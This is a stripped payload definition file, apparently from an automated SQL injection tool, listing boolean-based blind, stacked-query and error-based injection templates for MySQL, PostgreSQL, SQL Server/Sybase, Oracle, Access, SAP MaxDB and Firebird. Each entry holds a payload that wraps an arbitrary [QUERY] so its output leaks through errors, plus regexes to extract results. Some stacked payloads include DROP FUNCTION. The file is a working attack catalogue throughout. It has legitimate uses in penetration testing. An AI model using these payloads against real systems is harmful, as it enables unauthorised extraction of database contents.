    - - - AND boolean-based blind - WHERE or HAVING clause (Generic comment) - 1 - 4 - 1 - 1 - 1 - AND [INFERENCE] - - AND [RANDNUM]=[RANDNUM] - -- - - - AND [RANDNUM]=[RANDNUM1] - - - - - OR boolean-based blind - WHERE or HAVING clause - 1 - 2 - 3 - 1 - 2 - OR ([INFERENCE]) - - OR ([RANDNUM]=[RANDNUM]) - - - OR ([RANDNUM]=[RANDNUM1]) - - - - - OR boolean-based blind - WHERE or HAVING clause (MySQL comment) - 1 - 3 - 3 - 1 - 2 - OR ([INFERENCE]) - - OR ([RANDNUM]=[RANDNUM]) - # - - - OR ([RANDNUM]=[RANDNUM1]) - -
    - MySQL -
    -
    - - - OR boolean-based blind - WHERE or HAVING clause (Generic comment) - 1 - 3 - 3 - 1 - 2 - OR ([INFERENCE]) - - OR ([RANDNUM]=[RANDNUM]) - -- - - - OR ([RANDNUM]=[RANDNUM1]) - - - - - MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) - 1 - 3 - 1 - 1 - 1 - RLIKE IF([INFERENCE],[ORIGVALUE],0x28) - - RLIKE IF([RANDNUM]=[RANDNUM],[ORIGVALUE],0x28) - - - RLIKE IF([RANDNUM]=[RANDNUM1],[ORIGVALUE],0x28) - -
    - MySQL -
    -
    - - - - - - Generic boolean-based blind - Parameter replace (original value) - 1 - 2 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) - - - - - MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) - 1 - 3 - 1 - 1,2,3 - 3 - MAKE_SET([INFERENCE],[ORIGVALUE]) - - MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) - - - MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE]) - -
    - MySQL -
    -
    - - - MySQL boolean-based blind - Parameter replace (ELT - original value) - 1 - 4 - 1 - 1,2,3 - 3 - ELT([INFERENCE],[ORIGVALUE]) - - ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) - - - ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE]) - -
    - MySQL -
    -
    - - - MySQL boolean-based blind - Parameter replace (bool*int - original value) - 1 - 4 - 1 - 1,2,3 - 3 - ([INFERENCE])*[ORIGVALUE] - - ([RANDNUM]=[RANDNUM])*[ORIGVALUE] - - - ([RANDNUM]=[RANDNUM1])*[ORIGVALUE] - -
    - MySQL -
    -
    - - - MySQL >= 5.0 boolean-based blind - Parameter replace (original value) - 1 - 3 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - -
    - MySQL - >= 5.0 -
    -
    - - - MySQL < 5.0 boolean-based blind - Parameter replace (original value) - 1 - 4 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - -
    - MySQL -
    -
    - - - PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) - 1 - 3 - 2 - 1,2,3 - 3 - (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) - - (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) - - - (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) - -
    - PostgreSQL -
    -
    - - - Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) - 1 - 3 - 1 - 1,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Oracle boolean-based blind - Parameter replace (original value) - 1 - 3 - 1 - 1,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) - -
    - Oracle -
    -
    - - - Microsoft Access boolean-based blind - Parameter replace (original value) - 1 - 3 - 1 - 1,3 - 3 - IIF([INFERENCE],[ORIGVALUE],1/0) - - IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) - - - IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0) - -
    - Microsoft Access -
    -
    - - - SAP MaxDB boolean-based blind - Parameter replace (original value) - 1 - 3 - 1 - 1,3 - 3 - (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) - - (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) - - - (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) - -
    - SAP MaxDB -
    -
    - - - - - - Generic boolean-based blind - GROUP BY and ORDER BY clauses - 1 - 3 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) - - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) - - - - - Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value) - 1 - 4 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) - - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) - - - - - MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses - 1 - 3 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - -
    - MySQL - >= 5.0 -
    -
    - - - MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses - 1 - 4 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - -
    - MySQL -
    -
    - - - Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause - 1 - 3 - 1 - 3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Oracle boolean-based blind - GROUP BY and ORDER BY clauses - 1 - 3 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) - - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) - -
    - Oracle -
    -
    - - - Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses - 1 - 3 - 1 - 2,3 - 1 - ,IIF([INFERENCE],[ORIGVALUE],1/0) - - ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) - - - ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0) - -
    - Microsoft Access -
    -
    - - - - - - - MySQL stacked conditional-error blind queries - 1 - 3 - 0 - 0 - 1 - ; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]) - - ; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]) - # - - - ; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]) - -
    - MySQL -
    -
    - - - Microsoft SQL Server/Sybase stacked conditional-error blind queries - 1 - 3 - 0 - 0 - 1 - ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] - - ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] - -- - - - ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - PostgreSQL stacked conditional-error blind queries - 1 - 3 - 0 - 0 - 2 - ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) - - ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) - -- - - - ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) - -
    - PostgreSQL -
    -
    - - - - - - MySQL >= 5.0 AND error-based - WHERE or HAVING clause - 2 - 1 - 0 - 1 - 1 - AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) - - AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 5.0 -
    -
    - - - MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE) - 2 - 2 - 0 - 1 - 1 - AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) - - AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 5.1 -
    -
    - - - MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML) - 2 - 3 - 0 - 1 - 1 - AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) - - AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 5.1 -
    -
    - - - MySQL >= 4.1 AND error-based - WHERE or HAVING clause - 2 - 2 - 0 - 1 - 1 - AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) - - AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 4.1 -
    -
    - - - PostgreSQL AND error-based - WHERE or HAVING clause - 2 - 1 - 0 - 1 - 1 - AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) - - AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - PostgreSQL -
    -
    - - - Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause - 2 - 1 - 0 - 1 - 1 - AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) - - AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) - 2 - 2 - 0 - 1 - 1 - AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) - - AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Oracle AND error-based - WHERE or HAVING clause (XMLType) - 2 - 1 - 0 - 1 - 1 - AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - - AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Oracle -
    -
    - - - Oracle AND error-based - WHERE or HAVING clause (utl_inaddr.get_host_address) - 2 - 2 - 0 - 1 - 1 - AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') - - AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]') - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Oracle - >= 8.1.6 -
    -
    - - - Oracle AND error-based - WHERE or HAVING clause (ctxsys.drithsx.sn) - 2 - 3 - 0 - 1 - 1 - AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') - - AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Oracle -
    -
    - - - Firebird AND error-based - WHERE or HAVING clause - 2 - 2 - 0 - 1 - 1 - AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') - - AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Firebird -
    -
    - - - MySQL >= 5.0 OR error-based - WHERE or HAVING clause - 2 - 2 - 2 - 1 - 2 - OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) - - OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 5.0 -
    -
    - - - MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE) - 2 - 3 - 2 - 1 - 1 - OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) - - OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 5.1 -
    -
    - - - MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML) - 2 - 4 - 2 - 1 - 1 - OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) - - OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 5.1 -
    -
    - - - MySQL >= 4.1 OR error-based - WHERE or HAVING clause - 2 - 2 - 2 - 1 - 2 - OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) - - OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 4.1 -
    -
    - - - MySQL OR error-based - WHERE or HAVING clause - 2 - 3 - 2 - 1 - 2 - OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) - - OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) - # - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL -
    -
    - - - PostgreSQL OR error-based - WHERE or HAVING clause - 2 - 2 - 2 - 1 - 2 - OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) - - OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - PostgreSQL -
    -
    - - - Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause - 2 - 2 - 2 - 1 - 2 - OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) - - OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN) - 2 - 3 - 2 - 1 - 2 - OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) - - OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Oracle OR error-based - WHERE or HAVING clause (XMLType) - 2 - 2 - 2 - 1 - 2 - OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - - OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Oracle -
    -
    - - - Oracle OR error-based - WHERE or HAVING clause (utl_inaddr.get_host_address) - 2 - 3 - 2 - 1 - 2 - OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') - - OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]') - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Oracle - >= 8.1.6 -
    -
    - - - Oracle OR error-based - WHERE or HAVING clause (ctxsys.drithsx.sn) - 2 - 4 - 2 - 1 - 2 - OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') - - OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Oracle -
    -
    - - - Firebird OR error-based - WHERE or HAVING clause - 2 - 3 - 2 - 1 - 2 - OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') - - OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Firebird -
    -
    - - - - - - - MySQL >= 5.0 error-based - Parameter replace - 2 - 3 - 0 - 1,2,3 - 3 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) - - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 5.0 -
    -
    - - - MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE) - 2 - 3 - 0 - 1,2,3 - 3 - (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))) - - (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 5.1 -
    -
    - - - MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) - 2 - 4 - 0 - 1,2,3 - 3 - (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])) - - (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 5.1 -
    -
    - - - PostgreSQL error-based - Parameter replace - 2 - 3 - 0 - 1,2,3 - 3 - (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) - - (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - PostgreSQL -
    -
    - - - Microsoft SQL Server/Sybase error-based - Parameter replace - 2 - 3 - 0 - 1,3 - 3 - (CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))) - - (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Microsoft SQL Server - Sybase - Windows -
    -
